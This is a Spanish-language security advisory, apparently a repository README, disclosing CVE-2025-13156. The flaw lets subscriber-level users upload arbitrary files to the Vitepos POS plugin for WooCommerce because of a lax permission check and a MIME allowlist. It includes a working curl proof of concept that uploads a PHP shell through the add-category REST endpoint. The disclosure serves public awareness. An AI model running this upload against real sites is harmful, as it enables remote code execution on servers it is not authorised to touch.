
Divulgación para CVE-2025-13156
Divulgación para CVE-2025-13156
Este repositorio divulga una vulnerabilidad descubierta en Vitepos – Point of Sale (POS) for WooCommerce <= 3.3.0, plugin de WordPress desarrollado por appsbd.
| CVE ID | Tipo | Componente | Impacto |
|---|
| CVE-2025-13156 | Autenticado (Suscriptor+) Subida Arbitraria de Archivos para Ejecución Remota de Código | modules/class-pos-settings.php api/v1/class-pos-product-api.php | Subir archivos arbitrarios al servidor del sitio afectado |
curl -k \
'http://localhost:8080/wp-json/vitepos/v1/product/add-category' \
-H 'Cookie: wordpress_logged_in_<your_hash>=<your_cookie>' \
-H 'X-WP-Nonce: <your_nonce>' \
-F 'category_name=evil' \
-F 'category_parent=0' \
-F 'category_description=PoC-shell' \
-F 'category_image=@./shell.php;filename="shell.php";type=application/octet-stream'
Las rutas REST del plugin bajo /wp-json/vitepos/v1/product/... dependen de una comprobación de permisos permisiva que acepta efectivamente a cualquier usuario conectado (is_user_logged_in()), ignorando si el llamador es un usuario de POS o tiene la capacidad de gestionar términos de producto. Como resultado, los roles de bajo privilegio (por ejemplo, Suscriptor) pueden alcanzar endpoints como add-category/update-category.
Como no se puede colocar directamente en la raíz de WebRoot, puede que no se tenga éxito en algunos entornos. En Uploads, la ejecución de PHP no está permitida básicamente, así que pensé que no sería posible a menos que fuera un entorno muy extraño.
En el momento en que vi la cadena application/octet-stream en la lista blanca de MIME tuve un mal presentimiento, pero realmente funcionó, y me sorprendió.
Originalmente, el núcleo de WordPress evita la subida de PHP, pero este plugin implementaba su propio procesamiento, por lo que esta vulnerabilidad pudo reproducirse. Es un caso bastante raro.
Nombre: MooseLove
Rol: Investigador de seguridad independiente / cazador de bugs
Contacto: Disponible bajo petición
Este aviso se proporciona para la concienciación pública sobre seguridad. Libre de compartir con atribución.